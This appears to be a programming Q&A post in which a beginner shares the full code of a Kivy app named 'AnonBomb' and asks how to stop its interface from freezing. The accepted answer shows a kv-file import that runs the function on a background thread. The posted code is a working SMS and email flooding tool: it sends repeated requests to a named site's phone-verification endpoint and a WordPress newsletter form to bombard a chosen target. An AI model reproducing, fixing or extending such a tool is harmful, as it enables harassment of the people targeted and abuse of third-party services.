# How to fix kivy not responding while give it another task

Tags: python, kivy, python-multithreading, kivymd

I'm Beginner in python and kivy (maybe kivymd). I have created an app for my friend (actually he challenged me) after fixing a lot of error. But I have to fix another problem with help of you guys. The code is little big (around 300 lines) so I'm gonna give it at the end of my question. Now listen, The problem is When I press a button which is connected with a def/Function, and the function is not connected with the kivy. Actually the function do his work in background. and when it runs, the whole kivy program hang/It says Not responding. I listened about threading. But `on_press:threading.Thread(target=app.function_name)` doesn't work. It says `NameError: name 'threading' is not defined`. How can I fix `Not Responding` problem with/without `threading`. Can anyone help this poor guy??

Here is a Screenshot:
[image]

**And Here is The Full Code:**

```
from kivy.uix.boxlayout import BoxLayout
from kivymd.app import MDApp
import requests as rq
from requests.structures import CaseInsensitiveDict
from kivy.lang import Builder
from kivy.core.window import Window
import threading

Window.size=(400,600)

screen_helper="""
MDScreen:
    MDNavigationLayout:
        MDToolbar:
            id:toolbar
            title:'AnonBomb'
            pos_hint:{"top": 1}
            left_action_items:[['menu',lambda x: nav_drawer.set_state("open")]]
            elevation:20

    ScreenManager:
        id: screen_manager
        MDScreen:
            #_________________________Home Screen_________________________
            name:'home'
            #________1st Label________
            MDLabel:
                text:'This app is for fun, Not for Revange'
                theme_text_color:'Custom'
                text_color: 1,0,0
                font_style:'H6'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.8}
                size_hint_x:None
                width:300
            #________2nd Label________
            MDLabel:
                text:'We are not responsible for any misuse of our app'
                theme_text_color:'Custom'
                text_color: 0,0,1
                font_style:'H6'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.69}
                size_hint_x:None
                width:300
            #________3rd Label________
            MDLabel:
                text:'Choose Any Bomber Below'
                theme_text_color:'Custom'
                font_style:'H5'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.4}
                size_hint_x:None
                width:300
            #________Switch SMS Bomber Button________
            MDFillRoundFlatIconButton:
                text:'SMS Bomber'
                pos_hint:{'center_x':0.25,'center_y':0.2}
                icon:'message'
                on_press:screen_manager.current='sms'
            #________Switch Email Bomber Button________
            MDFillRoundFlatIconButton:
                text:'Email Bomber'
                pos_hint:{'center_x':0.75,'center_y':0.2}
                icon:'email'
                on_press:screen_manager.current='email'
                
        MDScreen:
            #_________________________SMS Bomber Screen_________________________
            name:'sms'
            #________1st Label________
            MDLabel:
                text:'SMS Bomber'
                font_style:'H5'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.83}
            #________2nd Label________
            MDLabel:
                text:'Note: SMS Bomber will Only work with Bangladeshi Numbers'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.75}
            #________Target Number________
            MDTextField:
                id:sms_target
                hint_text:'Enter Target Number (without +88)'
                pos_hint:{'center_x':0.5,'center_y':0.65}
                size_hint_x:None
                width:300
            #________SMS Amount________
            MDTextField:
                id:sms_amount
                hint_text:'Enter SMS Amount'
                pos_hint:{'center_x':0.5,'center_y':0.55}
                size_hint_x:None
                width:300
            #________Run Button________
            MDFillRoundFlatIconButton:
                text:'Start Bombing'
                pos_hint:{'center_x':0.5,'center_y':0.45}
                icon:'message'
                on_press:app.sms_bomb()
            #________Back Button________
            MDFillRoundFlatIconButton:
                text:'Back'
                pos_hint:{'center_x':0.16,'center_y':0.06}
                icon:'logout'
                on_press:screen_manager.current='home'
                
        MDScreen:
            #_________________________Email Bomber Screen_________________________
            name:'email'
            #________1st Label________
            MDLabel:
                text:'Email Bomber'
                font_style:'H5'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.83}
            #________Target Address________
            MDTextField:
                id:email_target
                hint_text:'Enter Target Mail'
                pos_hint:{'center_x':0.5,'center_y':0.65}
                size_hint_x:None
                width:300
            #________Email Amount________
            MDTextField:
                id:email_amount
                hint_text:'Enter Mail Amount'
                pos_hint:{'center_x':0.5,'center_y':0.55}
                size_hint_x:None
                width:300
            #________Run Button________
            MDFillRoundFlatIconButton:
                text:'Start Bombing'
                pos_hint:{'center_x':0.5,'center_y':0.45}
                icon:'email'
                on_press:app.email_bomb()
            #________Back Button________
            MDFillRoundFlatIconButton:
                text:'Back'
                pos_hint:{'center_x':0.16,'center_y':0.06}
                icon:'logout'
                on_press:screen_manager.current='home'
        
        
        MDScreen:
            #_________________________About ME Screen_________________________
            name:'about'
            #________1st Label________
            MDLabel:
                text:'About Me'
                font_style:'H5'
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.83}
            #________2nd Label________
            MDLabel:
                text:'''Hello Peep's, my name is S.M.Shahriar Zarir. I'm a little Python Developer from Bangladesh. I read in Python Class and I live with My Laptop Screen :), You can find me at linktr.ee/zariradvance'''
                halign:'center'
                pos_hint:{'center_x':0.5,'center_y':0.65}
                size_hint_x:None
                width:350
            #________Back Button________
            MDFillRoundFlatIconButton:
                text:'Back'
                pos_hint:{'center_x':0.16,'center_y':0.06}
                icon:'logout'
                on_press:screen_manager.current='home'
    
    MDNavigationDrawer:
        id:nav_drawer
        ContentNavigationDrawer:
            orientation: 'vertical'
            padding: '8dp'
            spacing: '8dp'
            ScrollView:
                MDList:
                    OneLineIconListItem:
                        text:'Home'
                        theme_text_color:'Custom'
                        text_color:0,0,1
                        on_press:
                            nav_drawer.set_state("close")
                            screen_manager.current='home'
                        IconLeftWidget:
                            icon:'home'
                            theme_text_color:'Custom'
                            text_color:0,0,1
                            
                    OneLineIconListItem:
                        text:'SMS Bomber'
                        theme_text_color:'Custom'
                        text_color:0,0,1
                        on_press:
                            nav_drawer.set_state("close")
                            screen_manager.current='sms'
                        IconLeftWidget:
                            icon:'message'
                            theme_text_color:'Custom'
                            text_color:0,0,1
                            
                    OneLineIconListItem:
                        text:'Email Bomber'
                        theme_text_color:'Custom'
                        text_color:0,0,1
                        on_press:
                            nav_drawer.set_state("close")
                            screen_manager.current='email'
                        IconLeftWidget:
                            icon:'email'
                            theme_text_color:'Custom'
                            text_color:0,0,1
                    
                    OneLineIconListItem:
                        text:'About Me'
                        theme_text_color:'Custom'
                        text_color:0,0,1
                        on_press:
                            nav_drawer.set_state("close")
                            screen_manager.current='about'
                        IconLeftWidget:
                            icon:'baby-face'
                            theme_text_color:'Custom'
                            text_color:0,0,1
                            





"""

class ContentNavigationDrawer(BoxLayout):
    pass

class AnonBomb(MDApp):
    def build(self):
        self.theme_cls.primary_palette = 'Blue'
        self.theme_cls.primary_hue = 'A700'
        self.layout=Builder.load_string(screen_helper)
        return self.layout

    def sms_bomb(self):
        target=self.root.ids.sms_target.text
        count=self.root.ids.sms_amount.text
        number=str(target)
        amount=int(count)
        url = "https://toffeelive.com/app/service.php"
        headers = CaseInsensitiveDict()
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        data = "phoneNumber="+number+"&route=auth_verify_mobile_no"
        resp = rq.post(url, headers=headers, data=data)
        for i in range(amount):
            resp = rq.post(url, headers=headers, data=data)
            if resp.status_code==200:
                print(f'>>> [+] {i+1} SMS Sent Successfully')
            elif resp.status_code==201:
                print(f'>>> [+] {i+1} SMS Sent Successfully')
        
    def email_bomb(self):
        target=self.root.ids.email_target.text
        count=self.root.ids.email_amount.text
        address = str(target)
        amount = int(count)
        url = "https://themezee.com/wp-admin/admin-ajax.php?action=mc4wp-form"
        headers = CaseInsensitiveDict()
        headers["Content-Type"] = "application/x-www-form-urlencoded"
        data = "EMAIL="+address+"&AGREE=1&_mc4wp_honeypot=&_mc4wp_timestamp=1614865641&_mc4wp_form_id=184963&_mc4wp_form_element_id=mc4wp-form-1"
        
        success=0
        failed=0
        
        for i in range(amount):
            resp = rq.post(url, headers=headers, data=data)
            if resp.status_code == 200:
                success += 1
                print(f'>>> [+] {success} Mail Sent Successfully')
            else:
                failed += 1
                print(f'>>> [+] {failed} Mail Sent Unsuccessfully')

        print(f'\n>>> Task Done! {success} mail sent & {failed} mail failed')




if __name__=='__main__':
    AnonBomb().run()
```

Note: I'm not gonna disturb someone with this tool, It just my friend's challenge for educational purpose only! Please help me

Answer (score 1, accepted):

Using `threading` is the right direction. You must import it in your `kv`, like this:

```
#:import Thread threading.Thread
```

Then you can use it something like this:

```
#:import Thread threading.Thread
Button:
    text: 'doit'
    on_release: Thread(target=app.do_something).start()
```

Comment: Thanks a lot. I didn't know about `#:import Thread threading.Thread` or how can i import module in kv. But someone told now! :)